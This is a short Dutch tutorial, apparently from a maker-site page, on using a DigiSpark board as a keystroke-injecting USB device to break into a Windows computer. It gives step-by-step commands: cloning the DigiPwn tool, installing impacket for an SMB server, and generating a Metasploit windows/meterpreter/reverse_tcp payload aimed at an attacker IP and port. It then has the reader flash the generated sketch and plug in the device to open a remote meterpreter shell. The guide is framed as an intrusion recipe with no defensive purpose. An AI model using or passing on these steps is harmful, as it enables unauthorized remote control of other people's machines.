Inhoudsopgave:
2025 Auteur: John Day | [email protected]. Laatst gewijzigd: 2025-01-13 06:57
Dus wat doen we hier?
DigiSpark is een kleine op Arduino gebaseerde ontwikkelingstool die kan fungeren als een HID-toetsenbordinvoer. Vandaag manipuleren we dit apparaat om achter een Windows-besturingssysteem te komen!
Benodigdheden
Arduino IDE
Een Windows-machine
DigiSpark
Metasploit-framework
Python 2.7 (Opmerking: je hebt python "2.7" nodig, ga niet voor een andere versie)
ingepakt
Brein! Het helpt
Stap 1: Kloon de DigiPwn-repository
Kloon naar de GitHub-repo van DigiPwn door
git clone
Verander nu de directory naar DigiPwn door
cd DigiPwn/
Stap 2: Installeer Impacket [modules vereist door Python]
Deze module is vereist om de SMB-server uit te voeren die nodig is voor de payload-bibliotheek
sudo apt-get install python-impacket
Of u kunt de impacket-bibliotheek downloaden en vanaf hier installeren.
Stap 3: Laten we de payload genereren
Loop
python DigiPwn.py [HOST] [POORT] [PAYLOAD] [UITVOERBESTAND] [format]
ex
python DigiPwn.py 192.168.1.2 8080 windows/meterpreter/reverse_tcp win.vbs win.vbs
Nu wordt u gevraagd of u de stager en SMB-server wilt starten. Druk op y en druk op enter
Stap 4: Upload nu de code naar Arduino
Voordat we uploaden, moeten we ervoor zorgen dat het DigiSpark-bord in Arduino is geïnstalleerd om dat hier te bekijken.
upload daarna het keystroke_inject.ino-bestand dat door het script is gegenereerd. Als je klaar bent, ben je klaar om
Stap 5: Tijd om de baby aan te sluiten
Sluit nu uw DigiSpark aan en wacht 10 seconden
BOOM Er is een meterpretersessie geopend!